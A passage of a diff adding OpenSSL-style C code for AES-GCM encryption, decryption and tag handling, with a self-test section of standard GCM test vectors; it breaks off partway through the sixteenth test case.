+                    out[i] = c ^ ctx->EKi.t[i];
+                    ctx->Xi.t[i] ^= c;
+                }
+                GCM_MUL(ctx, Xi);
+                out += 16;
+                in += 16;
+                len -= 16;
+            }
+# endif
+            if (len) {
+                (*block) (ctx->Yi.c, ctx->EKi.c, key);
+                ++ctr;
+                if (is_endian.little)
+# ifdef BSWAP4
+                    ctx->Yi.d[3] = BSWAP4(ctr);
+# else
+                    PUTU32(ctx->Yi.c + 12, ctr);
+# endif
+                else
+                    ctx->Yi.d[3] = ctr;
+                while (len--) {
+                    u8 c = in[n];
+                    ctx->Xi.c[n] ^= c;
+                    out[n] = c ^ ctx->EKi.c[n];
+                    ++n;
+                }
+            }
+
+            ctx->mres = n;
+            return 0;
+        } while (0);
+    }
+#endif
+    for (i = 0; i < len; ++i) {
+        u8 c;
+        if (n == 0) {
+            (*block) (ctx->Yi.c, ctx->EKi.c, key);
+            ++ctr;
+            if (is_endian.little)
+#ifdef BSWAP4
+                ctx->Yi.d[3] = BSWAP4(ctr);
+#else
+                PUTU32(ctx->Yi.c + 12, ctr);
+#endif
+            else
+                ctx->Yi.d[3] = ctr;
+        }
+        c = in[i];
+        out[i] = c ^ ctx->EKi.c[n];
+        ctx->Xi.c[n] ^= c;
+        n = (n + 1) % 16;
+        if (n == 0)
+            GCM_MUL(ctx, Xi);
+    }
+
+    ctx->mres = n;
+    return 0;
+}
+
+int CRYPTO_gcm128_encrypt_ctr32(GCM128_CONTEXT *ctx,
+                                const unsigned char *in, unsigned char *out,
+                                size_t len, ctr128_f stream)
+{
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+    unsigned int n, ctr;
+    size_t i;
+    u64 mlen = ctx->len.u[1];
+    void *key = ctx->key;
+#ifdef GCM_FUNCREF_4BIT
+    void (*gcm_gmult_p) (u64 Xi[2], const u128 Htable[16]) = ctx->gmult;
+# ifdef GHASH
+    void (*gcm_ghash_p) (u64 Xi[2], const u128 Htable[16],
+                         const u8 *inp, size_t len) = ctx->ghash;
+# endif
+#endif
+
+    mlen += len;
+    if (mlen > ((U64(1) << 36) - 32) || (sizeof(len) == 8 && mlen < len))
+        return -1;
+    ctx->len.u[1] = mlen;
+
+    if (ctx->ares) {
+        /* First call to encrypt finalizes GHASH(AAD) */
+        GCM_MUL(ctx, Xi);
+        ctx->ares = 0;
+    }
+
+    if (is_endian.little)
+#ifdef BSWAP4
+        ctr = BSWAP4(ctx->Yi.d[3]);
+#else
+        ctr = GETU32(ctx->Yi.c + 12);
+#endif
+    else
+        ctr = ctx->Yi.d[3];
+
+    n = ctx->mres;
+    if (n) {
+        while (n && len) {
+            ctx->Xi.c[n] ^= *(out++) = *(in++) ^ ctx->EKi.c[n];
+            --len;
+            n = (n + 1) % 16;
+        }
+        if (n == 0)
+            GCM_MUL(ctx, Xi);
+        else {
+            ctx->mres = n;
+            return 0;
+        }
+    }
+#if defined(GHASH) && !defined(OPENSSL_SMALL_FOOTPRINT)
+    while (len >= GHASH_CHUNK) {
+        (*stream) (in, out, GHASH_CHUNK / 16, key, ctx->Yi.c);
+        ctr += GHASH_CHUNK / 16;
+        if (is_endian.little)
+# ifdef BSWAP4
+            ctx->Yi.d[3] = BSWAP4(ctr);
+# else
+            PUTU32(ctx->Yi.c + 12, ctr);
+# endif
+        else
+            ctx->Yi.d[3] = ctr;
+        GHASH(ctx, out, GHASH_CHUNK);
+        out += GHASH_CHUNK;
+        in += GHASH_CHUNK;
+        len -= GHASH_CHUNK;
+    }
+#endif
+    if ((i = (len & (size_t)-16))) {
+        size_t j = i / 16;
+
+        (*stream) (in, out, j, key, ctx->Yi.c);
+        ctr += (unsigned int)j;
+        if (is_endian.little)
+#ifdef BSWAP4
+            ctx->Yi.d[3] = BSWAP4(ctr);
+#else
+            PUTU32(ctx->Yi.c + 12, ctr);
+#endif
+        else
+            ctx->Yi.d[3] = ctr;
+        in += i;
+        len -= i;
+#if defined(GHASH)
+        GHASH(ctx, out, i);
+        out += i;
+#else
+        while (j--) {
+            for (i = 0; i < 16; ++i)
+                ctx->Xi.c[i] ^= out[i];
+            GCM_MUL(ctx, Xi);
+            out += 16;
+        }
+#endif
+    }
+    if (len) {
+        (*ctx->block) (ctx->Yi.c, ctx->EKi.c, key);
+        ++ctr;
+        if (is_endian.little)
+#ifdef BSWAP4
+            ctx->Yi.d[3] = BSWAP4(ctr);
+#else
+            PUTU32(ctx->Yi.c + 12, ctr);
+#endif
+        else
+            ctx->Yi.d[3] = ctr;
+        while (len--) {
+            ctx->Xi.c[n] ^= out[n] = in[n] ^ ctx->EKi.c[n];
+            ++n;
+        }
+    }
+
+    ctx->mres = n;
+    return 0;
+}
+
+int CRYPTO_gcm128_decrypt_ctr32(GCM128_CONTEXT *ctx,
+                                const unsigned char *in, unsigned char *out,
+                                size_t len, ctr128_f stream)
+{
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+    unsigned int n, ctr;
+    size_t i;
+    u64 mlen = ctx->len.u[1];
+    void *key = ctx->key;
+#ifdef GCM_FUNCREF_4BIT
+    void (*gcm_gmult_p) (u64 Xi[2], const u128 Htable[16]) = ctx->gmult;
+# ifdef GHASH
+    void (*gcm_ghash_p) (u64 Xi[2], const u128 Htable[16],
+                         const u8 *inp, size_t len) = ctx->ghash;
+# endif
+#endif
+
+    mlen += len;
+    if (mlen > ((U64(1) << 36) - 32) || (sizeof(len) == 8 && mlen < len))
+        return -1;
+    ctx->len.u[1] = mlen;
+
+    if (ctx->ares) {
+        /* First call to decrypt finalizes GHASH(AAD) */
+        GCM_MUL(ctx, Xi);
+        ctx->ares = 0;
+    }
+
+    if (is_endian.little)
+#ifdef BSWAP4
+        ctr = BSWAP4(ctx->Yi.d[3]);
+#else
+        ctr = GETU32(ctx->Yi.c + 12);
+#endif
+    else
+        ctr = ctx->Yi.d[3];
+
+    n = ctx->mres;
+    if (n) {
+        while (n && len) {
+            u8 c = *(in++);
+            *(out++) = c ^ ctx->EKi.c[n];
+            ctx->Xi.c[n] ^= c;
+            --len;
+            n = (n + 1) % 16;
+        }
+        if (n == 0)
+            GCM_MUL(ctx, Xi);
+        else {
+            ctx->mres = n;
+            return 0;
+        }
+    }
+#if defined(GHASH) && !defined(OPENSSL_SMALL_FOOTPRINT)
+    while (len >= GHASH_CHUNK) {
+        GHASH(ctx, in, GHASH_CHUNK);
+        (*stream) (in, out, GHASH_CHUNK / 16, key, ctx->Yi.c);
+        ctr += GHASH_CHUNK / 16;
+        if (is_endian.little)
+# ifdef BSWAP4
+            ctx->Yi.d[3] = BSWAP4(ctr);
+# else
+            PUTU32(ctx->Yi.c + 12, ctr);
+# endif
+        else
+            ctx->Yi.d[3] = ctr;
+        out += GHASH_CHUNK;
+        in += GHASH_CHUNK;
+        len -= GHASH_CHUNK;
+    }
+#endif
+    if ((i = (len & (size_t)-16))) {
+        size_t j = i / 16;
+
+#if defined(GHASH)
+        GHASH(ctx, in, i);
+#else
+        while (j--) {
+            size_t k;
+            for (k = 0; k < 16; ++k)
+                ctx->Xi.c[k] ^= in[k];
+            GCM_MUL(ctx, Xi);
+            in += 16;
+        }
+        j = i / 16;
+        in -= i;
+#endif
+        (*stream) (in, out, j, key, ctx->Yi.c);
+        ctr += (unsigned int)j;
+        if (is_endian.little)
+#ifdef BSWAP4
+            ctx->Yi.d[3] = BSWAP4(ctr);
+#else
+            PUTU32(ctx->Yi.c + 12, ctr);
+#endif
+        else
+            ctx->Yi.d[3] = ctr;
+        out += i;
+        in += i;
+        len -= i;
+    }
+    if (len) {
+        (*ctx->block) (ctx->Yi.c, ctx->EKi.c, key);
+        ++ctr;
+        if (is_endian.little)
+#ifdef BSWAP4
+            ctx->Yi.d[3] = BSWAP4(ctr);
+#else
+            PUTU32(ctx->Yi.c + 12, ctr);
+#endif
+        else
+            ctx->Yi.d[3] = ctr;
+        while (len--) {
+            u8 c = in[n];
+            ctx->Xi.c[n] ^= c;
+            out[n] = c ^ ctx->EKi.c[n];
+            ++n;
+        }
+    }
+
+    ctx->mres = n;
+    return 0;
+}
+
+int CRYPTO_gcm128_finish(GCM128_CONTEXT *ctx, const unsigned char *tag,
+                         size_t len)
+{
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+    u64 alen = ctx->len.u[0] << 3;
+    u64 clen = ctx->len.u[1] << 3;
+#ifdef GCM_FUNCREF_4BIT
+    void (*gcm_gmult_p) (u64 Xi[2], const u128 Htable[16]) = ctx->gmult;
+#endif
+
+    if (ctx->mres || ctx->ares)
+        GCM_MUL(ctx, Xi);
+
+    if (is_endian.little) {
+#ifdef BSWAP8
+        alen = BSWAP8(alen);
+        clen = BSWAP8(clen);
+#else
+        u8 *p = ctx->len.c;
+
+        ctx->len.u[0] = alen;
+        ctx->len.u[1] = clen;
+
+        alen = (u64)GETU32(p) << 32 | GETU32(p + 4);
+        clen = (u64)GETU32(p + 8) << 32 | GETU32(p + 12);
+#endif
+    }
+
+    ctx->Xi.u[0] ^= alen;
+    ctx->Xi.u[1] ^= clen;
+    GCM_MUL(ctx, Xi);
+
+    ctx->Xi.u[0] ^= ctx->EK0.u[0];
+    ctx->Xi.u[1] ^= ctx->EK0.u[1];
+
+    if (tag && len <= sizeof(ctx->Xi))
+        return memcmp(ctx->Xi.c, tag, len);
+    else
+        return -1;
+}
+
+void CRYPTO_gcm128_tag(GCM128_CONTEXT *ctx, unsigned char *tag, size_t len)
+{
+    CRYPTO_gcm128_finish(ctx, NULL, 0);
+    memcpy(tag, ctx->Xi.c,
+           len <= sizeof(ctx->Xi.c) ? len : sizeof(ctx->Xi.c));
+}
+
+GCM128_CONTEXT *CRYPTO_gcm128_new(void *key, block128_f block)
+{
+    GCM128_CONTEXT *ret;
+
+    if ((ret = (GCM128_CONTEXT *)OPENSSL_malloc(sizeof(GCM128_CONTEXT))))
+        CRYPTO_gcm128_init(ret, key, block);
+
+    return ret;
+}
+
+void CRYPTO_gcm128_release(GCM128_CONTEXT *ctx)
+{
+    if (ctx) {
+        OPENSSL_cleanse(ctx, sizeof(*ctx));
+        OPENSSL_free(ctx);
+    }
+}
+
+#if defined(SELFTEST)
+# include <stdio.h>
+# include <openssl/aes.h>
+
+/* Test Case 1 */
+static const u8 K1[16], *P1 = NULL, *A1 = NULL, IV1[12], *C1 = NULL;
+static const u8 T1[] = {
+    0x58, 0xe2, 0xfc, 0xce, 0xfa, 0x7e, 0x30, 0x61,
+    0x36, 0x7f, 0x1d, 0x57, 0xa4, 0xe7, 0x45, 0x5a
+};
+
+/* Test Case 2 */
+# define K2 K1
+# define A2 A1
+# define IV2 IV1
+static const u8 P2[16];
+static const u8 C2[] = {
+    0x03, 0x88, 0xda, 0xce, 0x60, 0xb6, 0xa3, 0x92,
+    0xf3, 0x28, 0xc2, 0xb9, 0x71, 0xb2, 0xfe, 0x78
+};
+
+static const u8 T2[] = {
+    0xab, 0x6e, 0x47, 0xd4, 0x2c, 0xec, 0x13, 0xbd,
+    0xf5, 0x3a, 0x67, 0xb2, 0x12, 0x57, 0xbd, 0xdf
+};
+
+/* Test Case 3 */
+# define A3 A2
+static const u8 K3[] = {
+    0xfe, 0xff, 0xe9, 0x92, 0x86, 0x65, 0x73, 0x1c,
+    0x6d, 0x6a, 0x8f, 0x94, 0x67, 0x30, 0x83, 0x08
+};
+
+static const u8 P3[] = {
+    0xd9, 0x31, 0x32, 0x25, 0xf8, 0x84, 0x06, 0xe5,
+    0xa5, 0x59, 0x09, 0xc5, 0xaf, 0xf5, 0x26, 0x9a,
+    0x86, 0xa7, 0xa9, 0x53, 0x15, 0x34, 0xf7, 0xda,
+    0x2e, 0x4c, 0x30, 0x3d, 0x8a, 0x31, 0x8a, 0x72,
+    0x1c, 0x3c, 0x0c, 0x95, 0x95, 0x68, 0x09, 0x53,
+    0x2f, 0xcf, 0x0e, 0x24, 0x49, 0xa6, 0xb5, 0x25,
+    0xb1, 0x6a, 0xed, 0xf5, 0xaa, 0x0d, 0xe6, 0x57,
+    0xba, 0x63, 0x7b, 0x39, 0x1a, 0xaf, 0xd2, 0x55
+};
+
+static const u8 IV3[] = {
+    0xca, 0xfe, 0xba, 0xbe, 0xfa, 0xce, 0xdb, 0xad,
+    0xde, 0xca, 0xf8, 0x88
+};
+
+static const u8 C3[] = {
+    0x42, 0x83, 0x1e, 0xc2, 0x21, 0x77, 0x74, 0x24,
+    0x4b, 0x72, 0x21, 0xb7, 0x84, 0xd0, 0xd4, 0x9c,
+    0xe3, 0xaa, 0x21, 0x2f, 0x2c, 0x02, 0xa4, 0xe0,
+    0x35, 0xc1, 0x7e, 0x23, 0x29, 0xac, 0xa1, 0x2e,
+    0x21, 0xd5, 0x14, 0xb2, 0x54, 0x66, 0x93, 0x1c,
+    0x7d, 0x8f, 0x6a, 0x5a, 0xac, 0x84, 0xaa, 0x05,
+    0x1b, 0xa3, 0x0b, 0x39, 0x6a, 0x0a, 0xac, 0x97,
+    0x3d, 0x58, 0xe0, 0x91, 0x47, 0x3f, 0x59, 0x85
+};
+
+static const u8 T3[] = {
+    0x4d, 0x5c, 0x2a, 0xf3, 0x27, 0xcd, 0x64, 0xa6,
+    0x2c, 0xf3, 0x5a, 0xbd, 0x2b, 0xa6, 0xfa, 0xb4
+};
+
+/* Test Case 4 */
+# define K4 K3
+# define IV4 IV3
+static const u8 P4[] = {
+    0xd9, 0x31, 0x32, 0x25, 0xf8, 0x84, 0x06, 0xe5,
+    0xa5, 0x59, 0x09, 0xc5, 0xaf, 0xf5, 0x26, 0x9a,
+    0x86, 0xa7, 0xa9, 0x53, 0x15, 0x34, 0xf7, 0xda,
+    0x2e, 0x4c, 0x30, 0x3d, 0x8a, 0x31, 0x8a, 0x72,
+    0x1c, 0x3c, 0x0c, 0x95, 0x95, 0x68, 0x09, 0x53,
+    0x2f, 0xcf, 0x0e, 0x24, 0x49, 0xa6, 0xb5, 0x25,
+    0xb1, 0x6a, 0xed, 0xf5, 0xaa, 0x0d, 0xe6, 0x57,
+    0xba, 0x63, 0x7b, 0x39
+};
+
+static const u8 A4[] = {
+    0xfe, 0xed, 0xfa, 0xce, 0xde, 0xad, 0xbe, 0xef,
+    0xfe, 0xed, 0xfa, 0xce, 0xde, 0xad, 0xbe, 0xef,
+    0xab, 0xad, 0xda, 0xd2
+};
+
+static const u8 C4[] = {
+    0x42, 0x83, 0x1e, 0xc2, 0x21, 0x77, 0x74, 0x24,
+    0x4b, 0x72, 0x21, 0xb7, 0x84, 0xd0, 0xd4, 0x9c,
+    0xe3, 0xaa, 0x21, 0x2f, 0x2c, 0x02, 0xa4, 0xe0,
+    0x35, 0xc1, 0x7e, 0x23, 0x29, 0xac, 0xa1, 0x2e,
+    0x21, 0xd5, 0x14, 0xb2, 0x54, 0x66, 0x93, 0x1c,
+    0x7d, 0x8f, 0x6a, 0x5a, 0xac, 0x84, 0xaa, 0x05,
+    0x1b, 0xa3, 0x0b, 0x39, 0x6a, 0x0a, 0xac, 0x97,
+    0x3d, 0x58, 0xe0, 0x91
+};
+
+static const u8 T4[] = {
+    0x5b, 0xc9, 0x4f, 0xbc, 0x32, 0x21, 0xa5, 0xdb,
+    0x94, 0xfa, 0xe9, 0x5a, 0xe7, 0x12, 0x1a, 0x47
+};
+
+/* Test Case 5 */
+# define K5 K4
+# define P5 P4
+# define A5 A4
+static const u8 IV5[] = {
+    0xca, 0xfe, 0xba, 0xbe, 0xfa, 0xce, 0xdb, 0xad
+};
+
+static const u8 C5[] = {
+    0x61, 0x35, 0x3b, 0x4c, 0x28, 0x06, 0x93, 0x4a,
+    0x77, 0x7f, 0xf5, 0x1f, 0xa2, 0x2a, 0x47, 0x55,
+    0x69, 0x9b, 0x2a, 0x71, 0x4f, 0xcd, 0xc6, 0xf8,
+    0x37, 0x66, 0xe5, 0xf9, 0x7b, 0x6c, 0x74, 0x23,
+    0x73, 0x80, 0x69, 0x00, 0xe4, 0x9f, 0x24, 0xb2,
+    0x2b, 0x09, 0x75, 0x44, 0xd4, 0x89, 0x6b, 0x42,
+    0x49, 0x89, 0xb5, 0xe1, 0xeb, 0xac, 0x0f, 0x07,
+    0xc2, 0x3f, 0x45, 0x98
+};
+
+static const u8 T5[] = {
+    0x36, 0x12, 0xd2, 0xe7, 0x9e, 0x3b, 0x07, 0x85,
+    0x56, 0x1b, 0xe1, 0x4a, 0xac, 0xa2, 0xfc, 0xcb
+};
+
+/* Test Case 6 */
+# define K6 K5
+# define P6 P5
+# define A6 A5
+static const u8 IV6[] = {
+    0x93, 0x13, 0x22, 0x5d, 0xf8, 0x84, 0x06, 0xe5,
+    0x55, 0x90, 0x9c, 0x5a, 0xff, 0x52, 0x69, 0xaa,
+    0x6a, 0x7a, 0x95, 0x38, 0x53, 0x4f, 0x7d, 0xa1,
+    0xe4, 0xc3, 0x03, 0xd2, 0xa3, 0x18, 0xa7, 0x28,
+    0xc3, 0xc0, 0xc9, 0x51, 0x56, 0x80, 0x95, 0x39,
+    0xfc, 0xf0, 0xe2, 0x42, 0x9a, 0x6b, 0x52, 0x54,
+    0x16, 0xae, 0xdb, 0xf5, 0xa0, 0xde, 0x6a, 0x57,
+    0xa6, 0x37, 0xb3, 0x9b
+};
+
+static const u8 C6[] = {
+    0x8c, 0xe2, 0x49, 0x98, 0x62, 0x56, 0x15, 0xb6,
+    0x03, 0xa0, 0x33, 0xac, 0xa1, 0x3f, 0xb8, 0x94,
+    0xbe, 0x91, 0x12, 0xa5, 0xc3, 0xa2, 0x11, 0xa8,
+    0xba, 0x26, 0x2a, 0x3c, 0xca, 0x7e, 0x2c, 0xa7,
+    0x01, 0xe4, 0xa9, 0xa4, 0xfb, 0xa4, 0x3c, 0x90,
+    0xcc, 0xdc, 0xb2, 0x81, 0xd4, 0x8c, 0x7c, 0x6f,
+    0xd6, 0x28, 0x75, 0xd2, 0xac, 0xa4, 0x17, 0x03,
+    0x4c, 0x34, 0xae, 0xe5
+};
+
+static const u8 T6[] = {
+    0x61, 0x9c, 0xc5, 0xae, 0xff, 0xfe, 0x0b, 0xfa,
+    0x46, 0x2a, 0xf4, 0x3c, 0x16, 0x99, 0xd0, 0x50
+};
+
+/* Test Case 7 */
+static const u8 K7[24], *P7 = NULL, *A7 = NULL, IV7[12], *C7 = NULL;
+static const u8 T7[] = {
+    0xcd, 0x33, 0xb2, 0x8a, 0xc7, 0x73, 0xf7, 0x4b,
+    0xa0, 0x0e, 0xd1, 0xf3, 0x12, 0x57, 0x24, 0x35
+};
+
+/* Test Case 8 */
+# define K8 K7
+# define IV8 IV7
+# define A8 A7
+static const u8 P8[16];
+static const u8 C8[] = {
+    0x98, 0xe7, 0x24, 0x7c, 0x07, 0xf0, 0xfe, 0x41,
+    0x1c, 0x26, 0x7e, 0x43, 0x84, 0xb0, 0xf6, 0x00
+};
+
+static const u8 T8[] = {
+    0x2f, 0xf5, 0x8d, 0x80, 0x03, 0x39, 0x27, 0xab,
+    0x8e, 0xf4, 0xd4, 0x58, 0x75, 0x14, 0xf0, 0xfb
+};
+
+/* Test Case 9 */
+# define A9 A8
+static const u8 K9[] = {
+    0xfe, 0xff, 0xe9, 0x92, 0x86, 0x65, 0x73, 0x1c,
+    0x6d, 0x6a, 0x8f, 0x94, 0x67, 0x30, 0x83, 0x08,
+    0xfe, 0xff, 0xe9, 0x92, 0x86, 0x65, 0x73, 0x1c
+};
+
+static const u8 P9[] = {
+    0xd9, 0x31, 0x32, 0x25, 0xf8, 0x84, 0x06, 0xe5,
+    0xa5, 0x59, 0x09, 0xc5, 0xaf, 0xf5, 0x26, 0x9a,
+    0x86, 0xa7, 0xa9, 0x53, 0x15, 0x34, 0xf7, 0xda,
+    0x2e, 0x4c, 0x30, 0x3d, 0x8a, 0x31, 0x8a, 0x72,
+    0x1c, 0x3c, 0x0c, 0x95, 0x95, 0x68, 0x09, 0x53,
+    0x2f, 0xcf, 0x0e, 0x24, 0x49, 0xa6, 0xb5, 0x25,
+    0xb1, 0x6a, 0xed, 0xf5, 0xaa, 0x0d, 0xe6, 0x57,
+    0xba, 0x63, 0x7b, 0x39, 0x1a, 0xaf, 0xd2, 0x55
+};
+
+static const u8 IV9[] = {
+    0xca, 0xfe, 0xba, 0xbe, 0xfa, 0xce, 0xdb, 0xad,
+    0xde, 0xca, 0xf8, 0x88
+};
+
+static const u8 C9[] = {
+    0x39, 0x80, 0xca, 0x0b, 0x3c, 0x00, 0xe8, 0x41,
+    0xeb, 0x06, 0xfa, 0xc4, 0x87, 0x2a, 0x27, 0x57,
+    0x85, 0x9e, 0x1c, 0xea, 0xa6, 0xef, 0xd9, 0x84,
+    0x62, 0x85, 0x93, 0xb4, 0x0c, 0xa1, 0xe1, 0x9c,
+    0x7d, 0x77, 0x3d, 0x00, 0xc1, 0x44, 0xc5, 0x25,
+    0xac, 0x61, 0x9d, 0x18, 0xc8, 0x4a, 0x3f, 0x47,
+    0x18, 0xe2, 0x44, 0x8b, 0x2f, 0xe3, 0x24, 0xd9,
+    0xcc, 0xda, 0x27, 0x10, 0xac, 0xad, 0xe2, 0x56
+};
+
+static const u8 T9[] = {
+    0x99, 0x24, 0xa7, 0xc8, 0x58, 0x73, 0x36, 0xbf,
+    0xb1, 0x18, 0x02, 0x4d, 0xb8, 0x67, 0x4a, 0x14
+};
+
+/* Test Case 10 */
+# define K10 K9
+# define IV10 IV9
+static const u8 P10[] = {
+    0xd9, 0x31, 0x32, 0x25, 0xf8, 0x84, 0x06, 0xe5,
+    0xa5, 0x59, 0x09, 0xc5, 0xaf, 0xf5, 0x26, 0x9a,
+    0x86, 0xa7, 0xa9, 0x53, 0x15, 0x34, 0xf7, 0xda,
+    0x2e, 0x4c, 0x30, 0x3d, 0x8a, 0x31, 0x8a, 0x72,
+    0x1c, 0x3c, 0x0c, 0x95, 0x95, 0x68, 0x09, 0x53,
+    0x2f, 0xcf, 0x0e, 0x24, 0x49, 0xa6, 0xb5, 0x25,
+    0xb1, 0x6a, 0xed, 0xf5, 0xaa, 0x0d, 0xe6, 0x57,
+    0xba, 0x63, 0x7b, 0x39
+};
+
+static const u8 A10[] = {
+    0xfe, 0xed, 0xfa, 0xce, 0xde, 0xad, 0xbe, 0xef,
+    0xfe, 0xed, 0xfa, 0xce, 0xde, 0xad, 0xbe, 0xef,
+    0xab, 0xad, 0xda, 0xd2
+};
+
+static const u8 C10[] = {
+    0x39, 0x80, 0xca, 0x0b, 0x3c, 0x00, 0xe8, 0x41,
+    0xeb, 0x06, 0xfa, 0xc4, 0x87, 0x2a, 0x27, 0x57,
+    0x85, 0x9e, 0x1c, 0xea, 0xa6, 0xef, 0xd9, 0x84,
+    0x62, 0x85, 0x93, 0xb4, 0x0c, 0xa1, 0xe1, 0x9c,
+    0x7d, 0x77, 0x3d, 0x00, 0xc1, 0x44, 0xc5, 0x25,
+    0xac, 0x61, 0x9d, 0x18, 0xc8, 0x4a, 0x3f, 0x47,
+    0x18, 0xe2, 0x44, 0x8b, 0x2f, 0xe3, 0x24, 0xd9,
+    0xcc, 0xda, 0x27, 0x10
+};
+
+static const u8 T10[] = {
+    0x25, 0x19, 0x49, 0x8e, 0x80, 0xf1, 0x47, 0x8f,
+    0x37, 0xba, 0x55, 0xbd, 0x6d, 0x27, 0x61, 0x8c
+};
+
+/* Test Case 11 */
+# define K11 K10
+# define P11 P10
+# define A11 A10
+static const u8 IV11[] = { 0xca, 0xfe, 0xba, 0xbe, 0xfa, 0xce, 0xdb, 0xad };
+
+static const u8 C11[] = {
+    0x0f, 0x10, 0xf5, 0x99, 0xae, 0x14, 0xa1, 0x54,
+    0xed, 0x24, 0xb3, 0x6e, 0x25, 0x32, 0x4d, 0xb8,
+    0xc5, 0x66, 0x63, 0x2e, 0xf2, 0xbb, 0xb3, 0x4f,
+    0x83, 0x47, 0x28, 0x0f, 0xc4, 0x50, 0x70, 0x57,
+    0xfd, 0xdc, 0x29, 0xdf, 0x9a, 0x47, 0x1f, 0x75,
+    0xc6, 0x65, 0x41, 0xd4, 0xd4, 0xda, 0xd1, 0xc9,
+    0xe9, 0x3a, 0x19, 0xa5, 0x8e, 0x8b, 0x47, 0x3f,
+    0xa0, 0xf0, 0x62, 0xf7
+};
+
+static const u8 T11[] = {
+    0x65, 0xdc, 0xc5, 0x7f, 0xcf, 0x62, 0x3a, 0x24,
+    0x09, 0x4f, 0xcc, 0xa4, 0x0d, 0x35, 0x33, 0xf8
+};
+
+/* Test Case 12 */
+# define K12 K11
+# define P12 P11
+# define A12 A11
+static const u8 IV12[] = {
+    0x93, 0x13, 0x22, 0x5d, 0xf8, 0x84, 0x06, 0xe5,
+    0x55, 0x90, 0x9c, 0x5a, 0xff, 0x52, 0x69, 0xaa,
+    0x6a, 0x7a, 0x95, 0x38, 0x53, 0x4f, 0x7d, 0xa1,
+    0xe4, 0xc3, 0x03, 0xd2, 0xa3, 0x18, 0xa7, 0x28,
+    0xc3, 0xc0, 0xc9, 0x51, 0x56, 0x80, 0x95, 0x39,
+    0xfc, 0xf0, 0xe2, 0x42, 0x9a, 0x6b, 0x52, 0x54,
+    0x16, 0xae, 0xdb, 0xf5, 0xa0, 0xde, 0x6a, 0x57,
+    0xa6, 0x37, 0xb3, 0x9b
+};
+
+static const u8 C12[] = {
+    0xd2, 0x7e, 0x88, 0x68, 0x1c, 0xe3, 0x24, 0x3c,
+    0x48, 0x30, 0x16, 0x5a, 0x8f, 0xdc, 0xf9, 0xff,
+    0x1d, 0xe9, 0xa1, 0xd8, 0xe6, 0xb4, 0x47, 0xef,
+    0x6e, 0xf7, 0xb7, 0x98, 0x28, 0x66, 0x6e, 0x45,
+    0x81, 0xe7, 0x90, 0x12, 0xaf, 0x34, 0xdd, 0xd9,
+    0xe2, 0xf0, 0x37, 0x58, 0x9b, 0x29, 0x2d, 0xb3,
+    0xe6, 0x7c, 0x03, 0x67, 0x45, 0xfa, 0x22, 0xe7,
+    0xe9, 0xb7, 0x37, 0x3b
+};
+
+static const u8 T12[] = {
+    0xdc, 0xf5, 0x66, 0xff, 0x29, 0x1c, 0x25, 0xbb,
+    0xb8, 0x56, 0x8f, 0xc3, 0xd3, 0x76, 0xa6, 0xd9
+};
+
+/* Test Case 13 */
+static const u8 K13[32], *P13 = NULL, *A13 = NULL, IV13[12], *C13 = NULL;
+static const u8 T13[] = {
+    0x53, 0x0f, 0x8a, 0xfb, 0xc7, 0x45, 0x36, 0xb9,
+    0xa9, 0x63, 0xb4, 0xf1, 0xc4, 0xcb, 0x73, 0x8b
+};
+
+/* Test Case 14 */
+# define K14 K13
+# define A14 A13
+static const u8 P14[16], IV14[12];
+static const u8 C14[] = {
+    0xce, 0xa7, 0x40, 0x3d, 0x4d, 0x60, 0x6b, 0x6e,
+    0x07, 0x4e, 0xc5, 0xd3, 0xba, 0xf3, 0x9d, 0x18
+};
+
+static const u8 T14[] = {
+    0xd0, 0xd1, 0xc8, 0xa7, 0x99, 0x99, 0x6b, 0xf0,
+    0x26, 0x5b, 0x98, 0xb5, 0xd4, 0x8a, 0xb9, 0x19
+};
+
+/* Test Case 15 */
+# define A15 A14
+static const u8 K15[] = {
+    0xfe, 0xff, 0xe9, 0x92, 0x86, 0x65, 0x73, 0x1c,
+    0x6d, 0x6a, 0x8f, 0x94, 0x67, 0x30, 0x83, 0x08,
+    0xfe, 0xff, 0xe9, 0x92, 0x86, 0x65, 0x73, 0x1c,
+    0x6d, 0x6a, 0x8f, 0x94, 0x67, 0x30, 0x83, 0x08
+};
+
+static const u8 P15[] = {
+    0xd9, 0x31, 0x32, 0x25, 0xf8, 0x84, 0x06, 0xe5,
+    0xa5, 0x59, 0x09, 0xc5, 0xaf, 0xf5, 0x26, 0x9a,
+    0x86, 0xa7, 0xa9, 0x53, 0x15, 0x34, 0xf7, 0xda,
+    0x2e, 0x4c, 0x30, 0x3d, 0x8a, 0x31, 0x8a, 0x72,
+    0x1c, 0x3c, 0x0c, 0x95, 0x95, 0x68, 0x09, 0x53,
+    0x2f, 0xcf, 0x0e, 0x24, 0x49, 0xa6, 0xb5, 0x25,
+    0xb1, 0x6a, 0xed, 0xf5, 0xaa, 0x0d, 0xe6, 0x57,
+    0xba, 0x63, 0x7b, 0x39, 0x1a, 0xaf, 0xd2, 0x55
+};
+
+static const u8 IV15[] = {
+    0xca, 0xfe, 0xba, 0xbe, 0xfa, 0xce, 0xdb, 0xad,
+    0xde, 0xca, 0xf8, 0x88
+};
+
+static const u8 C15[] = {
+    0x52, 0x2d, 0xc1, 0xf0, 0x99, 0x56, 0x7d, 0x07,
+    0xf4, 0x7f, 0x37, 0xa3, 0x2a, 0x84, 0x42, 0x7d,
+    0x64, 0x3a, 0x8c, 0xdc, 0xbf, 0xe5, 0xc0, 0xc9,
+    0x75, 0x98, 0xa2, 0xbd, 0x25, 0x55, 0xd1, 0xaa,
+    0x8c, 0xb0, 0x8e, 0x48, 0x59, 0x0d, 0xbb, 0x3d,
+    0xa7, 0xb0, 0x8b, 0x10, 0x56, 0x82, 0x88, 0x38,
+    0xc5, 0xf6, 0x1e, 0x63, 0x93, 0xba, 0x7a, 0x0a,
+    0xbc, 0xc9, 0xf6, 0x62, 0x89, 0x80, 0x15, 0xad
+};
+
+static const u8 T15[] = {
+    0xb0, 0x94, 0xda, 0xc5, 0xd9, 0x34, 0x71, 0xbd,
+    0xec, 0x1a, 0x50, 0x22, 0x70, 0xe3, 0xcc, 0x6c
+};
+
+/* Test Case 16 */
+# define K16 K15
+# define IV16 IV15
+static const u8 P16[] = {
+    0xd9, 0x31, 0x32, 0x25, 0xf8, 0x84, 0x06, 0xe5,
+    0xa5, 0x59, 0x09, 0xc5, 0xaf, 0xf5, 0x26, 0x9a,
+    0x86, 0xa7, 0xa9, 0x53, 0x15, 0x34, 0xf7, 0xda,
